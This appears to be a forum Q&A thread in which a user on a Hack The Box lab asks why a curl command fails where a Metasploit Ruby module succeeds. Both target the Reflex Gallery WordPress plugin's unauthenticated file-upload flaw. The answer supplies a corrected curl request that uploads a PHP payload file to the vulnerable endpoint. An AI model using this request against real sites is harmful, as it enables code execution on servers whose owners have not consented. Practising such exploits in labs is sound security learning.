# Whats the difference between these two requests?

Tags: ruby, curl

I'm trying to use [this](https://www.exploit-db.com/exploits/36809) exploit (On HTB) without using `metasploit` but only the ruby request works.

Whats the difference between the ruby and curl request thats causing curl not to work?

```rb
...
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
...
res = send_request_cgi({
  'uri'       => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
  'method'    => 'POST',
  'vars_get'  => {
      'Year'    => "#{year}",
      'Month'   => "#{month}"
   },
  'ctype'     => "multipart/form-data; boundary=#{data.bound}",
  'data'      => post_data
})
```

```
curl -F "type=application/octet-stream" -F "name=\"qqfile\"" -F "filename=\"pony.php\"" \ 
'http://192.168.81.23/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2021&Month=08'
```

Edit: To answer some of the questions in the comments.

So the goal is to upload a file to a website using a post request to `php.php`. Using the ruby request, the file gets uploaded successfully, but we `curl` the request comes back with:
`No file uploaded`

I assumed it was because there is a difference in requests.

The ruby request is creating a post request to the same server, with the same, `name`, `filename`, `year`, `month`, but it gets a different output due to some reason I'm trying to figure out.

Based on the output from curl, it said that `POST` was implied so I omitted it.

Hopefully this clarifies it, but I'll try with the ctype and posting data.
I assumed `-F` sent data but I was wrong.

Comment: There are numerous missing pieces of information for me to know exactly what request your ruby is creating, so I cannot possibly answer your question with confidence. However, there also some "obvious" differences such as: You're not making a POST request, you didn't specify the `ctype` and you didn't specify any `data`.

Comment: Also, **what do you mean by "the cURL doesn't work"**? Please be specific. "Not working" is not a good enough description for us to understand the question.

Answer (score 0):

- As specified by TomLord you did'nt specified the request type which is POST.
- `ctype` is `Content-type` request header.
- And you are missing the file location which is being uploaded.

```
curl \
  -X POST \
  -H "Content-Type: application/octet-stream" \
  -F 'name=qqfile' \
  -F 'filename=random_name.php' \
  -F 'data=@/path/to/pony.php' \
  'http://192.168.81.23/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2021&Month=08'
```